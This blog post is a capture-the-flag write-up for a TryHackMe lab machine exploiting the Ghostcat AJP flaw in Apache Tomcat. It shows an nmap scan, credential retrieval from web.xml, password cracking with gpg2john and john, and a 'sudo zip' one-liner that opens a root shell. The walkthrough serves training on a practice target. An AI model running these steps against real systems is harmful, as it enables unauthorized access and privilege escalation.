Exploiting GhostCat(CVE-2020–1938)


The Walkthrough corresponds to tomghost machine of tryhackme:-https://tryhackme.com/room/tomghost


The Information of Vulnerability is given as:-

Ghostcat is described as “AJP Request Injection and potential Remote Code Execution


Nmap scan:- nmap -sC -sV tomghost.thm

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So as we can see the scan
  • port 8009 is Apache Jserv
  • port 8080 is Apache Tomcat/9.0.30

What is AJP?

The AJP is a binary protocol used by the Apache Tomcat webserver to communicate with the servlet container that sits behind the webserver using TCP connections. It is mainly used in a cluster or reverse proxy scenario where web servers communicate with application servers or servlet containers.

Why the vulnerability Exists?

The Vulnerability exist due to By default, Tomcat treats AJP connections as having a higher level of trust, when compared to HTTP connections. When AJP is implemented correctly, the protocol requires a secret, which is required by anyone who queries the protocol. When using the default Tomcat configuration, this secret is not enabled, meaning that no security check is done to requests coming into port 8009. This means that an unauthenticated attacker can access the port to read or potentially write to the server


using this PoC

let's see the file /WEB-INF/web.xml

Now we got skyfuck user and creds

ssh into skyfuck


We got user.txt but still can't see anything
There is interesting file in home dir of skyfuck, Lets decrypt that pgp

scp skyfuck@tomghost.thm:/home/skyfuck/* .
gpg2john tryhackme.asc
john --wordlist=/usr/share/wordlists/rockyou.txt tomghost.hash 

Now After doing that we got the pass of merlin

Login as merlin:-

as we can see merlin can use zip as root without passwd lets check GTFOBins

According to GTFO

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


So here we go

Got root.txt


Post a comment

Popular posts from this blog

TigerKing CTF Writeup